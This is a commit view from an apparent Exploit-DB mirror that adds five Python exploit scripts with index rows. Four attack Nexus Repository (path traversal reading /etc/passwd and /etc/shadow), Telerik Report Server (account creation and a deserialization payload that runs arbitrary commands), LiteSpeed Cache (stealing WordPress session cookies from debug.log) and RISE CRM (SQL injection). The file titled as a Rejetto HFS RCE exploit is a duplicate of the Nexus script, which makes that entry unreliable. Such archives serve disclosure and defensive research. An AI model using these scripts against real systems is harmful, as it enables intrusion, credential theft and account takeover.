bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2025-03-29

Browse source 
6 changes to exploits/shellcodes/ghdb

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Litespeed Cache 6.5.0.1 - Authentication Bypass

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2025-03-29 00:16:38 +00:00
parent 15b516383f
commit 353059c64d
6 changed files with 785 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

93
exploits/multiple/webapps/52101.py Executable file
View file

@ -0,0 +1,93 @@
# Exploit Title: CVE-2024-4956: Unauthenticated Path Traversal in Nexus Repository Manager 3
# Google Dork: header="Server: Nexus/3.53.0-01 (OSS)"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-4956
# Vendor Homepage: https://www.sonatype.com/nexus-repository
# Software Link: https://www.sonatype.com/nexus-repository
# Version: 3.53.0-01
# Tested on: Ubuntu 20.04
# CVE: CVE-2024-4956
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ ___ ____ __
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_
| | \ \ / /| _| __) | | | |__) | || |_ | || || (_) |___ \| '_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_| /_/|____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
def read_ip_port_list(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
return [line.strip() for line in lines]
def make_request(ip_port, url_path):
url = f"http://{ip_port}/{url_path}"
try:
response = requests.get(url, timeout=5)
return response.text
except requests.RequestException as e:
return None
def main(ip_port_list):
for ip_port in ip_port_list:
for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
response_text = make_request(ip_port, url_path)
if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
print(f"Address: {ip_port}")
print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
args = parser.parse_args()
if args.list:
ip_port_list = read_ip_port_list(args.list)
print(banner())
main(ip_port_list)
elif args.url:
ip_port_list = [args.url]
print(banner())
main(ip_port_list)
else:
print(banner())
parser.print_help()

383
exploits/multiple/webapps/52103.py Executable file
View file

@ -0,0 +1,383 @@
# Exploit Title: CVE-2024-4358: Telerik Report Server Authentication Bypass
# Fofa Dork: title="Telerik Report Server"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-4358
# Vendor Homepage: https://www.telerik.com/report-server
# Software Link: https://www.telerik.com/report-server
# Version: 2024 Q1 (10.0.24.305) and earlier
# Tested on: Windows Server 2019
# CVE: CVE-2024-4358
import aiohttp
import asyncio
from alive_progress import alive_bar
from colorama import Fore, Style
import os
import aiofiles
import time
import random
import argparse
from fake_useragent import UserAgent
import uvloop
import string
import zipfile
import base64
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [ green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ _________ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || ||___ / ___| ( _ )
| | \ \ / /| _| __) | | | |__) | || |_ _____| || |_ |_ \___ \ / _ \
| |___ \ V / | |___ / __/| |_| / __/|__ _|_____|__ _|__) |__) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_||____/____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
print(banner())
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4358" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP wtih port for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection")
parser.add_argument("-c", "--command", type=str, default="id", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a shell command to execute it")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}]")
args=parser.parse_args()
async def report(result):
try:
if args.output:
if os.path.isfile(args.output):
filename = args.output
elif os.path.isdir(args.output):
filename = os.path.join(args.output, f"results.txt")
else:
filename = args.output
else:
filename = "results.txt"
async with aiofiles.open(filename, "a") as w:
await w.write(result + '\n')
except KeyboardInterrupt as e:
quit()
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
pass
async def randomizer():
try:
strings = string.ascii_letters
return ''.join(random.choices(strings, k=30))
except Exception as e:
print(f"Exception in randomizer :{e}, {type(e)}")
async def exploit(payload,url, authToken, session, user, psw):
try:
randomReport = await randomizer()
headers = {"Authorization" : f"Bearer {authToken}"}
body1 = {"reportName":randomReport,
"categoryName":"Samples",
"description":None,
"reportContent":payload,
"extension":".trdp"
}
proxy = args.proxy if args.proxy else None
async with session.post( f"{url}/api/reportserver/report", ssl=False, timeout=30, proxy=proxy, json=body1, headers=headers) as response1:
if response1.status !=200:
print(f"[{bold}{green}Vulnerale{reset}]: {bold}{white}Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Deserialization RCE: Failed{reset}")
await report(f"Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Deserialization RCE: Failed\n----------------------------------")
return
async with session.post( f"{url}/api/reports/clients", json={"timeStamp":None}, ssl=False, timeout=30) as response2:
if response2.status == 200:
responsed2 = await response2.json()
id = responsed2['clientId']
else:
print(f"[{bold}{green}Vulnerale{reset}]: {bold}{white}Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Failed{reset}")
await report(f"Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Failed\n----------------------------------")
return
body2 ={"report":f"NAME/Samples/{randomReport}/",
"parameterValues":{}
}
async with session.post( f"{url}/api/reports/clients/{id}/parameters", json=body2, proxy=proxy, ssl=False, timeout=30) as finalresponse:
print(f"[{bold}{green}Vulnerale{reset}]: {bold}{white}Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Success{reset}")
await report(f"Report for: {url}\n Login crendential: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Success\n----------------------------------")
except KeyError as e:
pass
except aiohttp.ClientConnectionError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except TimeoutError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except KeyboardInterrupt as e:
SystemExit
except aiohttp.client_exceptions.ContentTypeError as e:
pass
except asyncio.CancelledError as e:
SystemExit
except aiohttp.InvalidURL as e:
pass
except Exception as e:
print(f"Exception at authexploit: {e}, {type(e)}")
async def create(url,user, psw, session):
try:
base_url=f"{url}/Startup/Register"
body = {"Username": user,
"Password": psw,
"ConfirmPassword": psw,
"Email": f"{user}@{user}.org",
"FirstName": user,
"LastName": user}
headers = {
"User-Agent": UserAgent().random,
"Content-Type": "application/x-www-form-urlencoded",
}
async with session.post(base_url, headers=headers, data=body, ssl=False, timeout=30) as response:
if response.status == 200:
return "success"
return "failed"
except KeyError as e:
pass
except aiohttp.ClientConnectionError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except TimeoutError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except aiohttp.InvalidURL as e:
pass
except aiohttp.client_exceptions.ContentTypeError as e:
pass
except Exception as e:
print(f"Exception at authexploitcreate: {e}, {type(e)}")
async def login(url, user, psw, session):
try:
base_url = f"{url}/Token"
body = {"grant_type": "password","username":user, "password": psw}
headers = {
"User-Agent": UserAgent().random,
"Content-Type": "application/x-www-form-urlencoded",
}
async with session.post( base_url, data=body, headers=headers, ssl=False, timeout=30) as response:
if response.status == 200:
responsed = await response.json()
return responsed['access_token']
except KeyError as e:
pass
except aiohttp.ClientConnectionError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except TimeoutError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except aiohttp.InvalidURL as e:
pass
except aiohttp.client_exceptions.ContentTypeError as e:
pass
except Exception as e:
print(f"Exception at authexploitLogin: {e}, {type(e)}")
async def streamwriter():
try:
with zipfile.ZipFile("payloads.trdp", 'w') as zipf:
zipf.writestr('[Content_Types].xml', '''<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/zip" /></Types>''')
zipf.writestr("definition.xml", f'''<Report Width="6.5in" Name="oooo"
xmlns="http://schemas.telerik.com/reporting/2023/1.0">
<Items>
<ResourceDictionary
xmlns="clr-namespace:System.Windows;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
xmlns:System="clr-namespace:System;assembly:mscorlib"
xmlns:Diag="clr-namespace:System.Diagnostics;assembly:System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
xmlns:ODP="clr-namespace:System.Windows.Data;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=31bf3856ad364e35"
>
<ODP:ObjectDataProvider MethodName="Start" >
<ObjectInstance>
<Diag:Process>
<StartInfo>
<Diag:ProcessStartInfo FileName="cmd" Arguments="/c {args.command}"></Diag:ProcessStartInfo>
</StartInfo>
</Diag:Process>
</ObjectInstance>
</ODP:ObjectDataProvider>
</ResourceDictionary>
</Items>''')
except Exception as e:
print(f"Exception at streamwriter: {e}, {type(e)}")
async def streamreader(file):
try:
async with aiofiles.open(file, 'rb') as file:
contents = await file.read()
bs64encrypted = base64.b64encode(contents).decode('utf-8')
return bs64encrypted
except Exception as e:
print(f"Exception at streamreder: {e}, {type(e)}")
async def core(url, sem, bar):
try:
user = await randomizer()
password = await randomizer()
async with aiohttp.ClientSession() as session:
status = await create(url, user, password, session)
if status == "success":
await asyncio.sleep(0.001)
authJWT = await login(url, user, password, session)
if authJWT:
payloads = await streamreader("payloads.trdp")
await exploit(payloads, url, authJWT, session, user, password)
await asyncio.sleep(0.002)
except Exception as e:
print(f"Exception at core: {e}, {type(e)}")
finally:
bar()
sem.release()
async def loader(urls, session, sem, bar):
try:
tasks = []
for url in urls:
await sem.acquire()
task = asyncio.ensure_future(core(url, sem, bar))
tasks.append(task)
await asyncio.gather(*tasks, return_exceptions=True)
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
print(f"Exception in loader: {e}, {type(e)}")
async def threads(urls):
try:
urls = list(set(urls))
sem = asyncio.BoundedSemaphore(args.threads)
customloops = uvloop.new_event_loop()
asyncio.set_event_loop(loop=customloops)
loops = asyncio.get_event_loop()
async with aiohttp.ClientSession(loop=loops) as session:
with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
loops.run_until_complete(await loader(urls, session, sem, bar))
except RuntimeError as e:
pass
except KeyboardInterrupt as e:
SystemExit
except Exception as e:
print(f"Exception in threads: {e}, {type(e)}")
async def main():
try:
urls = []
if args.url:
if args.url.startswith("https://") or args.url.startswith("http://"):
urls.append(args.url)
else:
new_url = f"https://{args.url}"
urls.append(new_url)
new_http = f"http://{args.url}"
urls.append(new_http)
await streamwriter()
await threads(urls)
if args.list:
async with aiofiles.open(args.list, "r") as streamr:
async for url in streamr:
url = url.strip()
if url.startswith("https://") or url.startswith("http://"):
urls.append(url)
else:
new_url = f"https://{url}"
urls.append(new_url)
new_http = f"http://{url}"
urls.append(new_http)
await streamwriter()
await threads(urls)
except FileNotFoundError as e:
print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
SystemExit
except Exception as e:
print(f"Exception in main: {e}, {type(3)})")
if __name__ == "__main__":
asyncio.run(main())

131
exploits/php/webapps/52099.py Executable file
View file

@ -0,0 +1,131 @@
# Exploit Title: Litespeed unauthorized account takeover
# Google Dork: [if applicable]
# Date: reported on 17 September 2024
# Exploit Author: Gnzls
# Vendor Homepage: https://www.litespeedtech.com/
# Software Link: https://github.com/gbrsh/CVE-2024-44000?tab=readme-ov-file
# Version: 6.5.0.1
# Tested on: macOS M2 pro
# CVE : CVE-2024-44000
import re
import sys
import requests
import argparse
from urllib.parse import urljoin
def extract_latest_cookies(log_content):
user_cookies = {}
pattern_cookie = re.compile(r'Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%')
for line in log_content.splitlines():
cookie_match = pattern_cookie.search(line)
if cookie_match:
username = cookie_match.group(1)
user_cookies[username] = line
return user_cookies
def choose_user(user_cookies):
users = list(user_cookies.keys())
if not users:
print("No users found.")
sys.exit(1)
# Display user options
print("Select a user to impersonate:")
for idx, user in enumerate(users):
print(f"{idx + 1}. {user}")
# Get the user's choice
choice = int(input("Pick a number: ")) - 1
if 0 <= choice < len(users):
return users[choice], user_cookies[users[choice]]
else:
print("Invalid selection.")
sys.exit(1)
print("--- LiteSpeed Account Takeover exploit ---")
print(" (unauthorized account access)")
print("\t\t\tby Gonzales")
parser = argparse.ArgumentParser()
parser.add_argument('url', help='http://wphost')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
log_file_url = urljoin(args.url, 'wp-content/debug.log')
response = requests.get(log_file_url)
if response.status_code == 200:
log_content = response.text
ucookies = extract_latest_cookies(log_content)
choice, cookie = choose_user(ucookies)
print(f"Go to {args.url}/wp-admin/ and set this cookie:")
print(cookie.split(']')[1])
else:
print("Log file not found.")
sys.exit(1)
1. Overview: Purpose and Target
The script aims to extract cookies (which contain session information) from a WordPress debug.log file, allowing the attacker to impersonate a logged-in user and access their account without authorization.
2. How the Code Works
extract_latest_cookies Function:
Purpose: This function scans the contents of the debug.log file and uses a regular expression to extract cookies for logged-in WordPress users.
How it Works:
The function reads each line of the debug.log file.
It searches for lines that contain cookies using the following regular expression: Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%.
This pattern matches WordPress login cookies and extracts the username and cookie value.
The extracted cookie values are stored in a dictionary called user_cookies, where the keys are usernames and the values are the corresponding cookie strings.
choose_user Function:
Purpose: Once cookies are extracted, this function allows the attacker to select which user's cookie to use for impersonation.
How it Works:
It checks if there are any users (i.e., cookies) available.
If no cookies are found, it prints a message and exits the program.
If cookies are found, it prints a list of users and asks the attacker to select one.
Once a user is selected, the function returns the corresponding cookie for that user.
Main Program:
Purpose: The main part of the script handles the workflow of retrieving the debug.log file, extracting cookies, and allowing the attacker to choose which user to impersonate.
How It Works:
The script takes a URL as input, which is the target WordPress site (e.g., http://wphost).
It constructs the URL to the debug.log file (http://wphost/wp-content/debug.log).
The script sends an HTTP request to this URL to fetch the log file.
If the file is found (response status 200), it passes the file content to the extract_latest_cookies function to extract cookies.
The attacker selects which user's cookie to use, and the script prints the cookie information.
The attacker can then use this cookie to impersonate the selected user by setting it in their browser and accessing the WordPress admin panel (/wp-admin/).
requests Library:
This library is used to send HTTP requests to the target site and retrieve the debug.log file.
argparse Library:
This allows the user to input the target WordPress URL from the command line.
sys.exit() Function:
The script uses this to exit the program in case of errors, such as when no users are found or the log file is inaccessible.
3. Potential for Abuse
This script exploits a vulnerability in WordPress by targeting publicly accessible debug.log files. If a site has misconfigured logging, this file might be available to anyone on the internet. By accessing the debug.log file, an attacker can extract sensitive session cookies, impersonate users, and gain unauthorized access to WordPress accounts (including admin accounts).

80
exploits/php/webapps/52100.py Executable file
View file

@ -0,0 +1,80 @@
########PROOF OF CONCEPT####################
# CVE: CVE-2024-8945
# Exploit Title: RISE Ultimate Project Manager 3.7 sql injection POC
# Google Dork: N/A
# Date: September 19, 2024
# Exploit Author: Jobyer Ahmed
# Author Homepage: https://bytium.com
# Vulnerable Version: 3.7
# Patched Version: 3.7.1
# Tested on: Ubuntu 24.04, Debian Testing
##########################################
############Instruction#######################
# 1. Login to Ultimate Project Manager 3.7
# 2. Add a New Dashboard
# 3. Launch the PoC Script
#
# Usage: python3 script.py <base_url> <email> <password>
###########################################
import requests
import sys
from termcolor import colored
def login_and_capture_session(base_url, email, password):
login_url = f"{base_url}/index.php/signin/authenticate"
login_data = {"email": email, "password": password, "redirect": ""}
login_headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
session = requests.Session()
response = session.post(login_url, data=login_data, headers=login_headers, verify=False)
if response.status_code == 200 and "dashboard" in response.url:
print(colored("[*] Logged in successfully.", "green"))
return session
else:
print(colored("[!] Login failed.", "red"))
return None
def send_payload(session, target_url, payload):
data = {
"id": payload,
"data": "false",
"title": "PoC Test",
"color": "#ff0000"
}
response = session.post(target_url, headers=session.headers, data=data, verify=False)
return response
def verify_vulnerability(session, target_url):
failed_payload = "-1 OR 1=2-- -"
failed_response = send_payload(session, target_url, failed_payload)
print(colored(f"\nFailed SQL Injection (False Condition) payload: {failed_payload}", "yellow"))
print(colored(f"{failed_response.text[:200]}", "cyan"))
successful_payload = "-1 OR 1=1-- -"
successful_response = send_payload(session, target_url, successful_payload)
if successful_response.status_code == 200 and "The record has been saved." in successful_response.text:
print(colored(f"[*] Vulnerability confirmed via SQL injection! Payload used: {successful_payload}", "green"))
print(colored(f"[*] Successful SQL Injection Response:\n{successful_response.text[:200]}", "cyan"))
print(colored("\nStatus: Vulnerable! Upgrade to patched version!", "red"))
else:
print(colored("\nNot vulnerable!","red"))
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python3 script.py <base_url> <email> <password>")
sys.exit(1)
base_url, email, password = sys.argv[1], sys.argv[2], sys.argv[3]
session = login_and_capture_session(base_url, email, password)
if not session:
sys.exit(1)
session.headers.update({"User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"})
target_url = f"{base_url}/index.php/dashboard/save"
verify_vulnerability(session, target_url)

93
exploits/typescript/webapps/52102.py Executable file
View file

@ -0,0 +1,93 @@
# Exploit Title: CVE-2024-23692: Unauthenticated RCE Flaw in Rejetto HTTP File Server
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ ___ ____ __
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_
| | \ \ / /| _| __) | | | |__) | || |_ | || || (_) |___ \| '_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_| /_/|____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
def read_ip_port_list(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
return [line.strip() for line in lines]
def make_request(ip_port, url_path):
url = f"http://{ip_port}/{url_path}"
try:
response = requests.get(url, timeout=5)
return response.text
except requests.RequestException as e:
return None
def main(ip_port_list):
for ip_port in ip_port_list:
for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
response_text = make_request(ip_port, url_path)
if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
print(f"Address: {ip_port}")
print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
args = parser.parse_args()
if args.list:
ip_port_list = read_ip_port_list(args.list)
print(banner())
main(ip_port_list)
elif args.url:
ip_port_list = [args.url]
print(banner())
main(ip_port_list)
else:
print(banner())
parser.print_help()

5
files_exploits.csv
View file

@ -12210,6 +12210,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,,2018-03-12,2018-03-12,0,,,,,,
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,,
9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,,
52103,exploits/multiple/webapps/52103.py,"Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass",2025-03-28,VeryLazyTech,webapps,multiple,,2025-03-28,2025-03-28,0,CVE-2024-4358,,,,,
35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,,
51264,exploits/multiple/webapps/51264.txt,"Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)",2023-04-05,"Andreas Finstad",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-23286,,,,,
12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,webapps,multiple,,2010-05-23,,1,,,,,,
@ -12277,6 +12278,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
49987,exploits/multiple/webapps/49987.txt,"Solar-Log 500 2.8.2 - Unprotected Storage of Credentials",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
52055,exploits/multiple/webapps/52055.py,"SolarWinds Platform 2024.1 SR1 - Race Condition",2024-06-26,"Elhussain Fathy",webapps,multiple,,2024-06-26,2024-06-26,0,CVE-2024-28999,,,,,
52101,exploits/multiple/webapps/52101.py,"Sonatype Nexus Repository 3.53.0-01 - Path Traversal",2025-03-28,VeryLazyTech,webapps,multiple,,2025-03-28,2025-03-28,0,CVE-2024-4956,,,,,
22852,exploits/multiple/webapps/22852.txt,"SonicWALL CDP 5040 6.x - Multiple Vulnerabilities",2012-11-20,Vulnerability-Lab,webapps,multiple,,2012-11-20,2012-11-20,0,OSVDB-87640;OSVDB-87639;OSVDB-87638,,,,,https://www.vulnerability-lab.com/get_content.php?id=549
24204,exploits/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution",2013-01-18,"Nikolas Sotiriu",webapps,multiple,,2013-01-18,2016-12-04,0,CVE-2013-1359;OSVDB-89347,,,,,
24203,exploits/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass",2013-01-18,"Nikolas Sotiriu",webapps,multiple,,2013-01-18,2013-01-18,0,CVE-2013-1360;OSVDB-89346,,,,,
@ -16155,6 +16157,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3599,exploits/php/webapps/3599.txt,"CodeBB 1.0 Beta 2 - 'phpbb_root_path' Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",webapps,php,,2007-03-27,,1,OSVDB-35423;CVE-2007-1839;OSVDB-35422,,,,,
3711,exploits/php/webapps/3711.html,"CodeBreak 1.1.2 - 'codebreak.php' Remote File Inclusion",2007-04-11,"John Martinelli",webapps,php,,2007-04-10,2016-11-14,1,OSVDB-34831;CVE-2007-1996,,,,,
41550,exploits/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",webapps,php,,2017-03-08,2017-03-08,0,,,,,,
52100,exploits/php/webapps/52100.py,"CodeCanyon RISE CRM 3.7.0 - SQL Injection",2025-03-28,"Jobyer From Bytium",webapps,php,,2025-03-28,2025-03-28,0,CVE-2024-8945,,,,,
6071,exploits/php/webapps/6071.txt,"CodeDB 1.1.1 - 'list.php' Local File Inclusion",2008-07-14,cOndemned,webapps,php,,2008-07-13,2016-12-13,1,OSVDB-47027;CVE-2008-3190,,,,,
26505,exploits/php/webapps/26505.txt,"Codegrrl - 'Protection.php' Code Execution",2005-11-14,"Robin Verton",webapps,php,,2005-11-14,2013-07-01,1,CVE-2005-3571;OSVDB-20816,,,,,https://www.securityfocus.com/bid/15417/info
